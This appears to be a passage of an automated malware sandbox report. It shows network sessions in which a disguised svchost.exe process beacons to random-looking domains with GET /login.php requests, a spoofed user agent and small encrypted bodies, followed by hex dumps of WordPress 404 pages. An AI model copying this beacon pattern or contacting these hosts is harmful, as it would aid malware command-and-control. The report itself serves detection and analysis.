                                                                                                                                                                                                              2024-08-23 16:47:19 UTC472INData Raw: 37 63 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c30<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-08-23 16:47:19 UTC1369INData Raw: 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73 69
                                                                                                                                                                                                              Data Ascii: ">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-si


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              3192.168.2.451121188.114.97.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:47:21 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:47:21 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:47:23 UTC895INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:23 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="42.8",amp_style_sanitizer;dur="17.2",amp_tag_and_attribute_sanitizer;dur="19.6",amp_optimizer;dur="17.2"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wmXPl4H3lnGaq8wJ03Ls33UfueLVhUX7ngG3VR0312p0U1%2FJv7bEifNzTAVESPBL1v8pLRPy06bCM9c8Lv16pzdl4jX2nFxN19tHmoOngQq1wBkAAz8hGSnTKLLwRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c957fde8a4346-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:47:23 UTC474INData Raw: 37 63 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c32<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-08-23 16:47:23 UTC1369INData Raw: 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73 69 7a 65
                                                                                                                                                                                                              Data Ascii: html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-size


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              4192.168.2.464278188.114.96.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC767INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:52 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkJxZ2bENh0IwZaZqePG7%2BBTYV%2BZf%2BMujWtx36pGR3OkXJIKhAHHcmiVY%2BmXOnZQjVu7nUie8vseIRlSihFlsW6PrBy%2FvU1YCNNs4xcR2biCNd%2FJ70L2bG6uhfe3%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c9640b83a0f88-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC602INData Raw: 37 63 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7cb2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70
                                                                                                                                                                                                              Data Ascii: ound -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65
                                                                                                                                                                                                              Data Ascii: ght),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.e
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74
                                                                                                                                                                                                              Data Ascii: e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}cat
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66
                                                                                                                                                                                                              Data Ascii: ' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-def
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67
                                                                                                                                                                                                              Data Ascii: e-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-heig
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b
                                                                                                                                                                                                              Data Ascii: or:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c
                                                                                                                                                                                                              Data Ascii: ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-singl
                                                                                                                                                                                                              2024-08-23 16:47:52 UTC1369INData Raw: 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72
                                                                                                                                                                                                              Data Ascii: ext"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-tr


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.464286188.114.96.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC761INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:54 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnF3EXksuUmW8G7Xy3uWgo3IZPagsRp7mUrDsP4d7e%2FOL8KIhiccdMKuvLW1%2Fd1pEzqtf%2FEpFJLS72TEOUrjYeOa8Kih7xLUPwFdBiaflP8rOErS3LlZVN%2F5iojKxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c964aec4b7d08-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:47:54 UTC608INData Raw: 37 63 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7cb7<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
